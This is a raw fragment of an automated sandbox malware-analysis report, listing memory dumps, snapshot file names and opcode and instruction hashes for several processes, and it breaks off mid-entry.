                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 4d06fa6ffed6ec0bea91ab6bef49ed36b5857152e4a9dfd8c7293bbe64f4a6f1
                                                                                    • Instruction ID: 78f3e9710b42fb09f176b80e877fb26e293c00c2ed5e9a472b7ac096cb436e99
                                                                                    • Opcode Fuzzy Hash: 4d06fa6ffed6ec0bea91ab6bef49ed36b5857152e4a9dfd8c7293bbe64f4a6f1
                                                                                    • Instruction Fuzzy Hash: 9651B107B0A57646E32333FD74611EFABA89F8137AB5C4677E24CDB0838C1961C292E5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &$2$P$U
                                                                                    • API String ID: 0-3755486490
                                                                                    • Opcode ID: 4719397407d34695ec5a2bcf4ae8a57de34c2b2a7a1ab26fe03666176ecba273
                                                                                    • Instruction ID: a75d40882574a9e04e0586241e5f138e73fe1bf65b9fb3861de064a310f54149
                                                                                    • Opcode Fuzzy Hash: 4719397407d34695ec5a2bcf4ae8a57de34c2b2a7a1ab26fe03666176ecba273
                                                                                    • Instruction Fuzzy Hash: 13F0A730B0D5064BF368CB18E491B7A72D6FB49310F20827DCD6EC619AD93C594655D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5[_H
                                                                                    • API String ID: 0-3279724263
                                                                                    • Opcode ID: cff4c4279dfb1d8a15e708b514388b2ff4223e9497cb10a257170f53bbf84f74
                                                                                    • Instruction ID: 3e71e96c146801e9aa0acb39da0fc58e64352d6d97d5347098f3eb4baff9e4fb
                                                                                    • Opcode Fuzzy Hash: cff4c4279dfb1d8a15e708b514388b2ff4223e9497cb10a257170f53bbf84f74
                                                                                    • Instruction Fuzzy Hash: D491F175A19A898FE789EB6C88757E97FE1FB97304F0401BBC149D72D2CA791815C300
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ce0eed792e2edf3c53c7d3e77ce806a8993cf8cb8cc5fbc6c709ef848ee8923
                                                                                    • Instruction ID: e65f006412e4566d7ea4882a35e926801221bff3802fb64471e7062388c04b61
                                                                                    • Opcode Fuzzy Hash: 1ce0eed792e2edf3c53c7d3e77ce806a8993cf8cb8cc5fbc6c709ef848ee8923
                                                                                    • Instruction Fuzzy Hash: 1751CF76A18A498BE798EB5C84757E87FE1FB9A714F5001BEC20DD77D1CABA18158300
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 212c8c925b9e172055eb89fdfd720c1d883e6128378e0dec7764c182828f588f
                                                                                    • Instruction ID: fa457c58b6c12b60b0c4b215dc8ba874b09a31fd8ca57e1c5d3cf62313353546
                                                                                    • Opcode Fuzzy Hash: 212c8c925b9e172055eb89fdfd720c1d883e6128378e0dec7764c182828f588f
                                                                                    • Instruction Fuzzy Hash: 1A415B12B4E6A61AE315B3BC60B92F96BA4DF86335F1445BBD24CC71D3CE2D688182C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 5c61d63ca75aea4fd92967288635f9759ee31530db8652748f8b57f2f07c308b
                                                                                    • Instruction ID: a2a23a997fdf8bccdf7ed9d0e0f202fcb5fc265f17b875b95278ab6efacebc69
                                                                                    • Opcode Fuzzy Hash: 5c61d63ca75aea4fd92967288635f9759ee31530db8652748f8b57f2f07c308b
                                                                                    • Instruction Fuzzy Hash: 93210420B5D9590FE758F76C54B97B972C6EB8A321F0040BDE60EC32E3DE39AC418280
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: f050f396ae4da028cbdc51a6a3dbae03963fae5e0048a34aab3323ef58c3d976
                                                                                    • Instruction ID: 46fc15ba3399836c0b79511b29640811bd6eb1bddb88e5f3fe0ee023526a871f
                                                                                    • Opcode Fuzzy Hash: f050f396ae4da028cbdc51a6a3dbae03963fae5e0048a34aab3323ef58c3d976
                                                                                    • Instruction Fuzzy Hash: 14213B11B0DA561AF365B3BC24BA2F922D5DF8A366F1445BBE50DC31D3CD2EAC804284
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5d21c021d5c16c112a72a4f97d0166ed3e5b009787cd6b7a6d2476e23fd3aa3b
                                                                                    • Instruction ID: 094a4634cc85e60e465933acea8d8e754e60b05054c9509193d41b131a89f8dc
                                                                                    • Opcode Fuzzy Hash: 5d21c021d5c16c112a72a4f97d0166ed3e5b009787cd6b7a6d2476e23fd3aa3b
                                                                                    • Instruction Fuzzy Hash: 23319231A0D68A8FDF46EB64C8A59A97BF0FF5B300B0805BBC009D71A3DA3DA845C751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.2790010330.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ffd343d0000_dasHost.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c021bc4a3aa684d455242704b1f712e3a5be6fdee756fff754e8d521af93c0ff
                                                                                    • Instruction ID: 2304485bda03568240602f77040cfcb87fed4ccddd5676544f02675bab5769c1
                                                                                    • Opcode Fuzzy Hash: c021bc4a3aa684d455242704b1f712e3a5be6fdee756fff754e8d521af93c0ff
                                                                                    • Instruction Fuzzy Hash: A401B131A0E3888FD702DB78D89419DBFB0EF43314F1641FAC140DB1A6D9385A58C781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e38f79f4c6f67e1b65adfd8974c9df803e0d247d73c471de7351d27d532f8ce
                                                                                    • Instruction ID: 9cd3b2061de38483f23fac508bf26a44155d90c250ef1a42012b3c2ad324cda8
                                                                                    • Opcode Fuzzy Hash: 0e38f79f4c6f67e1b65adfd8974c9df803e0d247d73c471de7351d27d532f8ce
                                                                                    • Instruction Fuzzy Hash: 43018F30A0E3888FE712DB74D49419DBFB0AF03304F1541EAC540DB196D9785A58C741
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5206cafcdc3d55d1ebf569d031aca4f5246edcae550be1228116c3f1ac54b64d
                                                                                    • Instruction ID: b4f956ac19803fc95a75edd0a4537a43b1d972a3a70dfd3e295d64659687d5f9
                                                                                    • Opcode Fuzzy Hash: 5206cafcdc3d55d1ebf569d031aca4f5246edcae550be1228116c3f1ac54b64d
                                                                                    • Instruction Fuzzy Hash: 18E07D3232C54E8FDF06FB3CDC974A47B50EB4B21078700FAD008CB0A2C212685E8B42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: 446c19d5f34a84a6fd5641d9d5a5f5e8940cf57c90f3e9f5fd93d673dacb3524
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: A7E01A30F0811A4BF798A348D8E13ADA2A4EB8A304F150478DB1ED33C9DDACAD509605
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: e8faba09d9b46697ea9f3db097673d5c764bb2f6985da2eb409b2c5348bca1d0
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 5EC00205F5A99B01A455336AA4A60ADE5415BC6625FD21572D70CD00999C8D20A5225A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: 87bb2d1afbdb6299e4c2006d85d0693c179426fa63320165a2dca1347feceac5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: B0C04C345518098FC948EB69C99591477A0FB1A215BD600A0E409C71B5D659DCD5DB41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: f2d40f74121abed2b9625437c75ed249d18bc8c5f09c373a344d4817d11b8cd4
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 30B00205D5684F01B45433BA59D6065F4505F46115FD61170D60DD019D9CCD55B52356
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 154bb44e6f77374ea633bcc119611125e0fc94b07fd68a89fc34f4d7670a4877
                                                                                    • Instruction ID: bbd548dde306652e3bc7b8fd006d05db6bacfa96dfe7b77538fa37a2f16e89cc
                                                                                    • Opcode Fuzzy Hash: 154bb44e6f77374ea633bcc119611125e0fc94b07fd68a89fc34f4d7670a4877
                                                                                    • Instruction Fuzzy Hash: 4F51D303B0A46305E32333FD74620FEAB68DF92376B684677E14CEA0974D0E61D682E5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5Z_H
                                                                                    • API String ID: 0-3267294416
                                                                                    • Opcode ID: 146f8b0cc645723e337f4363dc020959b3fe49039102ce54fa48363bacb1aac2
                                                                                    • Instruction ID: 8a83ce696b02bdf86e511642a62576ab0f296e4be52dd46661c05a7b6be7f925
                                                                                    • Opcode Fuzzy Hash: 146f8b0cc645723e337f4363dc020959b3fe49039102ce54fa48363bacb1aac2
                                                                                    • Instruction Fuzzy Hash: 2891F6B2A19A994FEB99EB5C88A57E97FE1FB96310F0400BBC049D72D2DE7914118700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b3a11c931049274633f1b09498fca1695dd96588818e3776e8f3abe4a2d9644a
                                                                                    • Instruction ID: a4cd3700ae56978bb6cf4575a0496d01511ca51bbdb389e39a251d351c997002
                                                                                    • Opcode Fuzzy Hash: b3a11c931049274633f1b09498fca1695dd96588818e3776e8f3abe4a2d9644a
                                                                                    • Instruction Fuzzy Hash: DB51C1B2A18A598BEB98DF5C88A57E97FE2FB9A310F54017FC009D37D1DAB914528700
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: d8f1fecdc614c36516423f8dac7c8f414728d23f4de8a91eca172132a6c36ed1
                                                                                    • Instruction ID: 44aab331974be2cef8372c206615b947adaebd0883e0e8201377ff5a0eb68b01
                                                                                    • Opcode Fuzzy Hash: d8f1fecdc614c36516423f8dac7c8f414728d23f4de8a91eca172132a6c36ed1
                                                                                    • Instruction Fuzzy Hash: DA412812B4E6650AE716F7BC64B62FA7B91DF46335B1804BFD18DC71D3CD2968C18281
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: a9ba9499d48b1c7621d439046e532314d0c71544562c7d4ce8c427d2caa63ab6
                                                                                    • Instruction ID: c84dc586cab53d00e512c93e92b66fd7c1221156590a505982ef6d81cdab63b4
                                                                                    • Opcode Fuzzy Hash: a9ba9499d48b1c7621d439046e532314d0c71544562c7d4ce8c427d2caa63ab6
                                                                                    • Instruction Fuzzy Hash: 7C312912B0E9551BE759F7AC64A66F677D5DF49321F1800BBD50EC31D3CC2DAC814280
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 6533f2a97ebac74d2895e7df161b4e5c3dd6fd161d47b904f6e344e5dc3e3d5d
                                                                                    • Instruction ID: 0ddec21b70a68d04efd05d28525fecd6e944c6fb078bc2269bc66f99996e5a00
                                                                                    • Opcode Fuzzy Hash: 6533f2a97ebac74d2895e7df161b4e5c3dd6fd161d47b904f6e344e5dc3e3d5d
                                                                                    • Instruction Fuzzy Hash: 2D212B2171A9591FEB99F76C54AA6B577C2EB99310F1800BDE54DC32D3DD28AC818640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec35f5c8b47dc6a88f9c9dbfb9ef6df2750763ac79da739d0c0babb5aa1d073a
                                                                                    • Instruction ID: e2bc4745250f033217148b2e81a5e5ce887e7d1568f31fc7f875f917f2b6b186
                                                                                    • Opcode Fuzzy Hash: ec35f5c8b47dc6a88f9c9dbfb9ef6df2750763ac79da739d0c0babb5aa1d073a
                                                                                    • Instruction Fuzzy Hash: 9F31B531A0D68A8FDF46EB64C8A59A97BF0EF17300B0905FBC009D7193DA7DA885C751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 961c50ecccd3a12d2b19c0ff3538334bf9a6a743cc42c1b007991df2e60fdb71
                                                                                    • Instruction ID: 3179053f7924f98de58a280fd3995a62d8c3f2816112d9a674ec7d7833f2bf34
                                                                                    • Opcode Fuzzy Hash: 961c50ecccd3a12d2b19c0ff3538334bf9a6a743cc42c1b007991df2e60fdb71
                                                                                    • Instruction Fuzzy Hash: 9A210432B0E2998FE312EB6898A51DE7FB0EF43324F1845B7C280DB1D2D538158A9781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction ID: 71633ac4c7688aee68c77d964617aacd735d19f0551b20aea7672a14208685e2
                                                                                    • Opcode Fuzzy Hash: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction Fuzzy Hash: 3B11C232A0E7988FE702EB78D8A42DE7FB0EF43310F1944B7C280DB192D53816898780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction ID: 9b26fb760e8ece7771a2b95fe5cc28d312cacfc8ae7bc242b13dd73dc54dd2f1
                                                                                    • Opcode Fuzzy Hash: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction Fuzzy Hash: BF016136A0E7988FE702EB6898A41DE7FB0EF43314F1945E6C680DB192D53856899781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343e0000_chainPorthostCommon.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
